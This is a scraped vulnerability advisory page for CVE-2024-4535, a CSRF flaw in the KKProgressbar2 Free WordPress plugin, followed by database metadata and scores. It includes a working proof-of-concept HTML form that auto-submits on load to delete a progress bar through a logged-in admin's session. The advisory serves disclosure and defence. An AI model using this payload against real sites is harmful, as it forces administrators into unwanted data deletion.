Lucene search
Bob MatyasWPEX-ID:D4980886-DA10-4BBC-A84A-FE071AB3B755HistoryMay 06, 2024 - 12:00 a.m.
KKProgressbar2 Free <= 1.1.4.2 - Progress Bar Deletion via CSRF
2024-05-0600:00:00
Bob Matyas
26
kkprogressbar2 free
csrf exploit
may 20 2024
progress bar deletion
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks
Make a logged in admin open an HTML file containing (where `<<ID>>` is a valid ID):
```
<body onload="document.forms[0].submit()">
<form action="http://example.com/wp-admin/admin.php?page=kkpb-menu" method="post">
<input type="hidden" name="action" value="delete-project">
<input type="hidden" name="id" value="<<ID>>">
</form>
</body>
```Related
vulnrichment
vulnrichment
wpvulndb
wpvulndb
KKProgressbar2 Free <= 1.1.4.2 - Progress Bar Deletion via CSRF
2024-05-06 00:00:00
nvd
nvd
CVE-2024-4535
2024-05-27 06:15:10
cve
cve
CVE-2024-4535
2024-05-27 06:15:10
cvelist
cvelist
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:D4980886-DA10-4BBC-A84A-FE071AB3B755